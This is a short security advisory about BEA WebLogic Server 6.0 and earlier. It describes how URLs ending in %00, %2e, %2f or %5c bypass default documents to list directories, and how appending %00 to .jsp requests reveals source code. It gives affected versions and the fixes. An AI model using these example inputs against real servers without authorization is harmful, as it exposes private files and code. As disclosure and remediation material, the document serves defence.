|
Vulnerability Weblogic Affected Bea Weblogic Server 6.0 and prior Description Following is based on a Defcom Labs Advisory def-2001-14 by Peter Grundl. The Bea Weblogic server contains a flaw that allows directory browsing even if the directories contain default documents. By requesting a URL and ending it with one of the following ascii representations: %00, %2e, %2f or %5c, it is possible to bypass the listing of the default document (eg. index.html) and browse the content of the web folders. Examples: http://www.foo.org/%00/ http://www.foo.org/images/%2e/ http://www.foo.org/passwords/%2f/ http://www.foo.org/creditcard/%5c/ The four unicode representations translate to "null", ".", "/" and "\". It is interesting to note that similar (in fact, worse) behaviour is exhibited in both Weblogic 4.5.1 and 5.1. Appending a '%00' to the end of a .jsp request retrieves the source of the jsp. Results look something like this: 4.5.1 SP13 Single : Yes 4.5.1 SP13 Cluster: Yes 4.5.1 SP11 Single : Yes 4.5.1 SP11 Cluster: No 5.1 SP6 Single: Yes 5.1 SP3 Single: Yes Appending a '%00' to the end of a .jsp request retrieves the source of the jsp. This has been reproduced on WL 4.5.1 SP11 and SP13 in both cluster and standalone configurations. Also, it has been reproduced with 5.1 SP6 and SP3, all in a Solaris environment. Tried it on AIX 4.3.3 with WebLogic 5.1.0 Service Pack 6 - It works! The negative result above got with SP11 turned out to be quite interesting - it occurs only when passed through libproxy.so 4.5.1 SP7. Testing directly against the weblogic server, the %00 trick works. When proxied (through Netscape Enterprise Server) via solaris/libproxy.so 4.5.1 SP8, SP9, SP11, SP11(with fix), and SP13, it also works. When proxied through 4.5.1 SP7, it does not. Solution Download and install Weblogic 6.0 with Service Pack 1: http://commerce.bea.com/downloads/weblogic_server.jsp#wls For some people installing V6.0Sp1 might not be an option. Those people are adviced to contact Bea Systems Support for assistance with this issue. In the WLS console set the "index directory" from "enabled" to "disabled". It should be noted that this will not fix the issue with revealing jsp sourcecode that Adam Boileau reported to Bugtraq in response to the original posting of this advisory!